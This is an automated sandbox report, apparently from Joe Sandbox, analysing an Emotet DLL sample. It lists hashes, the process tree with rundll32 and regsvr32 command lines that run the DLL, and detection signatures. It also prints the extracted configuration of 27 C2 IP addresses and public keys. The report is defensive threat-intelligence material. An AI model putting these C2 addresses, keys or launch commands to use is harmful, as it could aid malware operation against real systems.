Loading ...

Play interactive tourEdit tour

Windows Analysis Report nV5Wu77N8J

Overview

General Information

Sample Name:nV5Wu77N8J (renamed file extension from none to dll)
Analysis ID:553353
MD5:a0306b7a6a12022e4fc8e586b0bc90ec
SHA1:ee7d221826a725a2110bbddbea34bd14522b5ab4
SHA256:9b1ca060b5a969f03c4c8d99ad487a454742e47fff97343a90afacb5da7d9589
Tags:32dllexe
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Suspicious Call by Ordinal
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 7128 cmdline: loaddll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 7148 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 3296 cmdline: rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 6344 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 7160 cmdline: regsvr32.exe /s C:\Users\user\Desktop\nV5Wu77N8J.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • rundll32.exe (PID: 6192 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6244 cmdline: rundll32.exe C:\Users\user\Desktop\nV5Wu77N8J.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 5356 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bdaefwhkzqb\lrinxnmhyts.ogu",XLurkV MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 6040 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bdaefwhkzqb\lrinxnmhyts.ogu",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • WerFault.exe (PID: 3660 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 568 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 5672 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6676 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 6712 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 7128 -ip 7128 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 808 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7064 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4296 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["45.138.98.34:80", "69.16.218.101:8080", "51.210.242.234:8080", "185.148.168.220:8080", "142.4.219.173:8080", "54.38.242.185:443", "191.252.103.16:80", "104.131.62.48:8080", "62.171.178.147:8080", "217.182.143.207:443", "168.197.250.14:80", "37.44.244.177:8080", "66.42.57.149:443", "210.57.209.142:8080", "159.69.237.188:443", "116.124.128.206:8080", "128.199.192.135:8080", "195.154.146.35:443", "185.148.168.15:8080", "195.77.239.39:8080", "207.148.81.119:8080", "85.214.67.203:8080", "190.90.233.66:443", "78.46.73.125:443", "78.47.204.80:443", "37.59.209.141:8080", "54.37.228.122:443"], "Public Key": ["RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW", "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.718929777.0000000003501000.00000020.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    0000000E.00000002.1188125968.00000000049D1000.00000020.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      0000000E.00000002.1190726376.00000000059A0000.00000040.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000006.00000002.718904101.00000000034D0000.00000040.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000006.00000002.719243124.0000000005161000.00000020.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 45 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            14.2.rundll32.exe.55b0000.12.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              14.2.rundll32.exe.5030000.4.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                3.2.rundll32.exe.4770000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  4.2.rundll32.exe.53b0000.4.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    0.2.loaddll32.exe.de0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 71 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Call by OrdinalShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7148, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",#1, ProcessId: 3296

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 0.0.loaddll32.exe.de0000.3.raw.unpackMalware Configuration Extractor: Emotet {"C2 list": ["45.138.98.34:80", "69.16.218.101:8080", "51.210.242.234:8080", "185.148.168.220:8080", "142.4.219.173:8080", "54.38.242.185:443", "191.252.103.16:80", "104.131.62.48:8080", "62.171.178.147:8080", "217.182.143.207:443", "168.197.250.14:80", "37.44.244.177:8080", "66.42.57.149:443", "210.57.209.142:8080", "159.69.237.188:443", "116.124.128.206:8080", "128.199.192.135:8080", "195.154.146.35:443", "185.148.168.15:8080", "195.77.239.39:8080", "207.148.81.119:8080", "85.214.67.203:8080", "190.90.233.66:443", "78.46.73.125:443", "78.47.204.80:443", "37.59.209.141:8080", "54.37.228.122:443"], "Public Key": ["RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW", "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0"]}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: nV5Wu77N8J.dllVirustotal: Detection: 16%Perma Link
                      Source: nV5Wu77N8J.dllReversingLabs: Detection: 13%
                      Source: nV5Wu77N8J.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000010.00000003.730451291.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000010.00000003.730451291.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000010.00000003.730451291.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.726747041.0000000002F12000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.726920017.0000000002F12000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.726719293.00000000049D6000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000010.00000003.730451291.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000010.00000003.730451291.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.727134531.0000000002F18000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.726928256.0000000002F18000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.726753757.0000000002F18000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000010.00000003.727134531.0000000002F18000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.726928256.0000000002F18000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.726753757.0000000002F18000.00000004.00000001.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000010.00000003.730451291.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000010.00000003.730451291.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000010.00000003.730451291.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.726739926.0000000002F0C000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.727328906.0000000002F0C000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000010.00000003.726747041.0000000002F12000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.726920017.0000000002F12000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000010.00000003.730451291.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000010.00000003.730451291.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: a[ojr^oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000010.00000002.741443173.0000000000A72000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000010.00000003.730451291.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000010.00000003.730451291.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000010.00000003.726739926.0000000002F0C000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.727328906.0000000002F0C000.00000004.00000001.sdmp

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.2.4:49770 -> 45.138.98.34:80
                      Source: TrafficSnort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.4:49771 -> 69.16.218.101:8080
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 69.16.218.101 144Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.138.98.34 80Jump to behavior
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 45.138.98.34:80
                      Source: Malware configuration extractorIPs: 69.16.218.101:8080
                      Source: Malware configuration extractorIPs: 51.210.242.234:8080
                      Source: Malware configuration extractorIPs: 185.148.168.220:8080
                      Source: Malware configuration extractorIPs: 142.4.219.173:8080
                      Source: Malware configuration extractorIPs: 54.38.242.185:443
                      Source: Malware configuration extractorIPs: 191.252.103.16:80
                      Source: Malware configuration extractorIPs: 104.131.62.48:8080
                      Source: Malware configuration extractorIPs: 62.171.178.147:8080
                      Source: Malware configuration extractorIPs: 217.182.143.207:443
                      Source: Malware configuration extractorIPs: 168.197.250.14:80
                      Source: Malware configuration extractorIPs: 37.44.244.177:8080
                      Source: Malware configuration extractorIPs: 66.42.57.149:443
                      Source: Malware configuration extractorIPs: 210.57.209.142:8080
                      Source: Malware configuration extractorIPs: 159.69.237.188:443
                      Source: Malware configuration extractorIPs: 116.124.128.206:8080
                      Source: Malware configuration extractorIPs: 128.199.192.135:8080
                      Source: Malware configuration extractorIPs: 195.154.146.35:443
                      Source: Malware configuration extractorIPs: 185.148.168.15:8080
                      Source: Malware configuration extractorIPs: 195.77.239.39:8080
                      Source: Malware configuration extractorIPs: 207.148.81.119:8080
                      Source: Malware configuration extractorIPs: 85.214.67.203:8080
                      Source: Malware configuration extractorIPs: 190.90.233.66:443
                      Source: Malware configuration extractorIPs: 78.46.73.125:443
                      Source: Malware configuration extractorIPs: 78.47.204.80:443
                      Source: Malware configuration extractorIPs: 37.59.209.141:8080
                      Source: Malware configuration extractorIPs: 54.37.228.122:443
                      Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                      Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                      Source: Joe Sandbox ViewIP Address: 207.148.81.119 207.148.81.119
                      Source: Joe Sandbox ViewIP Address: 104.131.62.48 104.131.62.48
                      Source: global trafficTCP traffic: 192.168.2.4:49771 -> 69.16.218.101:8080
                      Source: unknownNetwork traffic detected: IP country count 11
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.138.98.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.138.98.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.138.98.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: svchost.exe, 00000014.00000003.805231702.0000020B3A794000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.facebook.com (Facebook)
                      Source: svchost.exe, 00000014.00000003.805231702.0000020B3A794000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.twitter.com (Twitter)
                      Source: svchost.exe, 00000014.00000003.805310657.0000020B3A7A5000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.805231702.0000020B3A794000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: svchost.exe, 00000014.00000003.805310657.0000020B3A7A5000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.805231702.0000020B3A794000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: svchost.exe, 00000014.00000003.805231702.0000020B3A794000.00000004.00000001.sdmpString found in binary or memory: trings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify - Music and Podcasts","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NCBCSZSJRSB","Properties":{"FulfillmentData":{"ProductId":"9NCBCSZSJRSB","WuCategoryId":"5c353b9c-7ac7-4d27-af07-923e7d9aa2e2","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","SkuId":"0011"},"FulfillmentType":"WindowsUpdate","FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"Spotify"}],"Architectures":["x86"],"Capabilities":["internetClient","runFullTrust","Microsoft.storeFilter.core.notSupported_8wekyb3d8bbwe"],"ExperienceIds":[],"MaxDownloadSizeInBytes":104380919,"MaxInstallSizeInBytes":203345920,"PackageFormat":"Appx","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","MainPackageFamilyNameForDlc":null,"PackageFullName":"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0","PackageId":"3fbafb47-f476-4c26-4445-49acb9a726e6-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750754275328,"MinVersion":2814750710366559,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0\",\"content.productId\":\"caac1b9d-621b-4f96-b143-e10e1397740a\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814750754275328,\"platform.minVersion\":2814750710366559,\"platform.target\":3}],\"content.type\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Music\",\"optOut.backupRestore\":true,\"optOut.removeableMedia\":false},\"policy2\":{\"ageRating\":3,\"optOut.DVR\":false,\"thirdPartyAppRatings\":[{\"level\":9,\"systemId\":3},{\"leve
